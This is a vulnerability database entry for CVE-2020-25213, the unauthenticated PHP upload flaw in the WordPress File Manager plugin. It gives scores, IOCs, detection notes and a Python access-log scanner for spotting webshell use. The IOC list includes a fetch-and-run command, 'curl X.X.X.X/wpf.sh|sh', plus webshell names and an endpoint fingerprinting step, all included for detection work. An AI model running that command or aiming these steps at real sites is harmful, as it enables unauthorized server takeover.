cbcvebase.
CVE-2020-25213
published 2020-09-09


Priority: P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 97.33% (99.9th percentile)
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.

Affected

1 range

Vendor          Product        Version range   Fixed in
filemanagerpro  file_manager   < 6.9           6.9

Detection & IOCs (extracted from sources)

url: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
url: /wp-content/plugins/wp-file-manager/lib/files/k.php
path: /wp-content/plugins/wp-file-manager/lib/files/
filename: k.php
filename: wpf.sh
filename: shell.php
hash: 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
hash: 5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889
hash: dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839
hash: a68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62
hash: f1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794
command: curl X.X.X.X/wpf.sh|sh
filename: kinsing
other: reqid=17457a1fe6959
  • Detect unauthenticated POST requests to the vulnerable elFinder connector endpoint, which requires no authentication and accepts arbitrary file uploads
  • Monitor for GET requests to PHP files dropped under the wp-file-manager lib/files/ directory, especially with a 'cmd' query parameter indicating webshell execution
  • Fingerprint the vulnerable endpoint by sending a bare GET/POST; a response of {"error":["errUnknownCmd"]} confirms the vulnerable connector is exposed
  • Palo Alto Networks Threat Prevention covers this vulnerability with TID 59286; use this signature ID for NGFW detection
  • The Nuclei template matcher looks for both 'poc.txt' and 'added' in the JSON response body with Content-Type application/json and HTTP 200 to confirm successful exploitation
  • The vulnerable file connector.minimal.php is only present in wp-file-manager versions 6.0 through 6.8; version 6.9 removes the file and is not vulnerable
  • The connector endpoint has no access restrictions whatsoever: no authentication is required to reach or abuse it, making network-layer blocking the most reliable mitigation if patching is delayed
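The first two detection notes above translate directly into web-server log monitoring. The following is an added example written for this page, not code from the database or from the plugin's authors: it parses combined-format access log lines (the sample lines are constructed, with documentation-range IPs) and flags requests to the elFinder connector endpoint, requests for PHP files under the plugin's lib/files/ drop directory, and the higher-confidence case where such a request carries a 'cmd' query parameter. The rule names and severities are this example's own choices, not identifiers from any product.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths taken from the IOC list on this page.
CONNECTOR_PATH = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
DROP_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"

# Constructed sample access log (Apache/nginx combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Sep/2020:10:12:01 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 512 "-" "python-requests/2.24"
203.0.113.5 - - [03/Sep/2020:10:12:03 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.24"
198.51.100.7 - - [03/Sep/2020:10:15:44 +0000] "GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Sep/2020:10:16:00 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/notes.txt HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def classify_request(method, target):
    """Return a finding dict for a suspicious request target, or None.

    Rule names and severities are this example's own labels (assumptions).
    """
    parts = urlsplit(target)
    # Decode percent-encoding so an encoded path cannot slip past a literal compare.
    path = unquote(parts.path)

    # Any hit on the connector is notable because the endpoint requires no
    # authentication; a POST is the upload/mkfile/put path and rates higher.
    if path == CONNECTOR_PATH:
        severity = "high" if method == "POST" else "medium"
        return {"rule": "elfinder_connector_request", "severity": severity}

    # PHP served out of the plugin's lib/files/ directory is where dropped
    # webshells live; a 'cmd' parameter is the execution pattern noted above.
    if path.startswith(DROP_DIR) and path.lower().endswith(".php"):
        if "cmd" in parse_qs(parts.query):
            return {"rule": "webshell_exec", "severity": "critical"}
        return {"rule": "dropped_php_access", "severity": "high"}

    return None


def scan_log(text):
    """Parse each log line and collect findings with request context attached."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hit = classify_request(m["method"], m["target"])
        if hit:
            findings.append({
                **hit,
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": m["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['rule']}: {f['ip']} {f['target']} -> {f['status']}")
```

Run against the constructed sample, the scanner reports the POST to the connector and the GET to k.php with cmd=id, and stays quiet on the legitimate admin page view and on a non-PHP file in lib/files/. On a real site, feed it the access log and pair a connector hit followed shortly by a lib/files/*.php request from the same client with the file hashes listed above to triage quickly.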

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck           10.0   CRITICAL
cisa                9.8    CRITICAL